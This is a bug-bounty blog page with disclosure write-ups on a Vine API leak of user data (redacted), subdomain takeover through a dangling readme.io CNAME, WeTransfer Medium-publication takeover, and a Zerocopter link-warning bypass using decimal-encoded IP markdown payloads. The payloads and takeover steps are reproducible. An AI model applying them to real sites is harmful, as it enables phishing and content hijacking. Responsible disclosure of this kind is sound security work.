“0x33ccbf”, “twitterVerified”: 1, “captchaRequired”: 0, “edition”: null, “acceptsOutOfNetworkConversations”: 1, “disableAddressBook”: 1, “description”: “Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library”, “escStrikeCount”: 0, “review_result_explicit”: 0, “notificationsLastViewed”: “2016–04–26T21:03:35.000000”, “email”: “████████”, “hideFromPopular”: 0, “admin”: 0, “contentReview”: 0, “created”: “2013–04–13T19:30:31.000000”, “review_result_illegal_confirmed”: 0, “followingCount”: null, “lastLogin”: “2016–12–13T23:29:40.000000”, “escUser”: 0, “ipAddress”: “██████”, “twitterConnected”: 1}, “success”: true, “error”: “”}
  • Take a closer look in response and you will get a lot of private info about the user [ all information was removed by Twitter security as those belongs to other users ].
  • Some of them are
    “platforms”: [“android”, “ios”]
    “flaggedCount”: 7579
    “twitterId”: “█████████”
    “phoneNumber”: “█████”
    “location”: “Los Angeles California”
    “modified”: “2017–01–29T01:24:00.000000”
    “notificationsLastViewed”: “2016–04–26T21:03:35.000000”
    “email”: “█████████”
    “created”: “2013–04–13T19:30:31.000000”
    “lastLogin”: “2016–12–13T23:29:40.000000”
    “ipAddress”: “█████”

Here Even ipAddress/email/phone is being disclosed. So an attacker can use this info and do malicious attacks on any vine user. An Attacker can dump all user information.

This will also affect Twitter users as vine users can use their Twitter account access to login to vine services. I have got the same vulnerability on another bug bounty program Edmodo’s website.

Thanks for reading. Happy Hunting. 😀

Categories
Bug Bounty

Subdomain takeover due to misconfigured project settings

Hi readers,
Today I will write about Subdomain takeover. It’s a common Security issue that is actually a developers mistake when they left an Unused/unclaimed 3rd party Service DNS CNAME record for a subdomain of theirs and Hackers can claim those subdomains with the help of external services, it pointing to what could lead to serious issues. You can learn more about Subdomain takeover from detectify blog.While testing flock.com I got a domain flock.co what is under flock company. So I started looking at its subdomains and got the subdomain newdev.flock.co and when I visited the subdomain in the browser I got an error like the below screenshot

Project doesn't exist error
Project doesn’t exist error

This took my attention . So I checked the DNS record for this domain .

$ dig newdev.flock.co; <<>> DiG 9.10.6 <<>> newdev.flock.co
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13182
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;newdev.flock.co. IN A;; ANSWER SECTION:
newdev.flock.co. 299 IN CNAME cname.readme.io.
cname.readme.io. 299 IN CNAME readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com.
readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com. 59 IN A 52.0.214.29
readme-cache-prod-1392018356.us-east-1.elb.amazonaws.com. 59 IN A 52.5.249.117;; Query time: 69 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Jul 09 04:58:06 +06 2018
;; MSG SIZE rcvd: 175

From the above record, we can say the subdomain is pointing to CNAME cname.readme.io. So I start looking at custom domain documents on the readme.io website to understand how they work. From their document, I understand that

  • You need a subdomain pointing to your readme.io subdomain like yoursubdomain.readme.io.
  • Your subdomain should be configured in domains settings on the following page https://dash.readme.io/project/<project_Name>/v1.0/domains

So to take over I need to check if cname.readme.io is already claimed or not. But Unfortunately, it was already claimed 🙁. But I have seen many such services don’t force users to verify their ownership of domains by using the same CNAME txt record as their service subdomain. So still there’s hope.I opened an account in readme.io and I got a subdomain newdev.readme.io. Then I go to domains settings https://dash.readme.io/project/newdev/v1.0/domains and in Custom Domain Field used newdev.flock.co as value and save changes.Now when I visited newdev.flock.co It redirected me to http://newdev.flock.co/inactive this page what saying now that Not Yet Active

Subdomain Takeover by Prial P0C
Subdomain Takeover by Prial P0C

This is showing as I am using a trial account. In the webpage title above screenshot, you will see the project name that I used while creating the project. So now this domain is serving my contents from newdev.readme.io project page.

How to avoid such issues?: Always update your DNS records. remove CNAME or any other DNS records what is not in use.If you find a security vulnerability feel free to contact them via [email protected]com

Thanks for reading.

Categories
Bug Bounty

Unclaimed Medium Publication takeover in WeTransfer

Today I will share a Security issue I found on WeTransfer. WeTransfer has a paid bug-bounty program under Zerocopter. So I start testing their sites. While I was brute-forcing wetransfer.com with DIRB script I got some directories what was redirecting users to the Medium Publication link. Those directories look like

    https://wetransfer.com/blogger (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransferger')
    https://wetransfer.com/bloggers (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfergers')
    https://wetransfer.com/blogindex (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransferindex')
    https://wetransfer.com/blogs (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfers’)
    https://wetransfer.com/blogspot (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransferspot')
    https://wetransfer.com/blog_ajax (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfer_ajax')
    https://wetransfer.com/blog_inlinemod (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfer_inlinemod')
    https://wetransfer.com/blog_report (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfer_report')
    https://wetransfer.com/blog_search (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfer_search')
    https://wetransfer.com/blog_usercp (CODE:301|SIZE:0)
    (Location: ‘https://medium.com/wetransfer_usercp')

Now When I visited the location link https://medium.com/wetransferger I got error like below screenshot

404 error on medium
404 error on medium

Now I go to https://medium.com/me/publications and Created a new publication using the same name wetransferger and I got the publication link under My control and was able to place anything on the publication like the below screenshot

Publication Takeover P0C By Prial
Publication Takeover P0C By Prial

Now whenever a User will visit https://wetransfer.com/blogger it will take the user to my Medium Publication. I was able to claim 5 Unclaimed Publications. All others were not exploitable as they used _(Underscore) in the medium link and in medium _(Underscore) is not allowed as a Publication link.I reported this issue to WeTransfer Bug Bounty Program and they rewarded me with 100 Euro + 1year WeTransfer Plus Account.

wetreansfers response
wetreansfers response

Conclusion: If you are using medium publications link with your site make sure it’s valid and claimed by you.

Thanks For Reading.

Categories
Bug Bounty

External link warning page bypass in Zerocopter

Description:

zerocopter.com is a bug bounty platform for Ethical hackers just like Hackerone. In Zerocopter reports, users can use Markdown. Users are also allowed to give external links in reports. If a user clicks on the External link in reports then it takes the user to an external warning page like the below screenshot

Zerocopter external warning page
Zerocopter external warning page

But I was able to bypass the external warning page and redirect a user to an external link without any warning page by using Markdown

<http:1249723505> 
[Click Me](http:1249723505)

Note: In the above markdown 1249723505 this is the IP of google.com [ 74.125.68.113 ] converted into Long/Decimalusing this tool.

Reproduce
  • In a report I used [Click Me](http://google.com)</code> this markdown and the response was :
    <a href="/external_redirect?href=http%3A%2F%2Fgoogle.com" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Then I used [Click Me](http://74.125.68.113) this markdown and the response was
    <a href="/external_redirect?href=http%3A%2F%2F74.125.68.113" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Then I thought let’s mess up with the Protocol and changed the markdown to [Click Me](http:/google.com) and still no bypass.
  • Then I was about to use [Click Me](http:google.com) but I accidentally used [Click Me](http:google) where I forgot to give .com TLD at last in domain name in the markdown and I noticed a hope in response
    <a href="http%3Agoogle" rel="noreferrer" target="_blank" title="">Click Me</a>
  • By analyzing the behavior I got that if I use a domain name like http:google then I can bypass the external warning page. Then I remembered the IP Long/Decimal encode.
    So I used this tool to encode google.com IP to Long/Decimal** and the final markdown become [Click Me](http:1249723505) and bingo 😎

    <a href="http%3A1249723505" rel="noreferrer" target="_blank" title="">Click Me</a>
  • Now when a user will click on the link it will take the user directly to google.com instead of the external warning page. Then I reported this to Zerocopter on their responsible disclosure page and they fixed it and send me a Cool T-shirt and stickers as a reward.

Cool T-shirt and stickers as reward
Cool T-shirt and stickers as reward

Thanks for reading. Hope this will be helpful for you guys.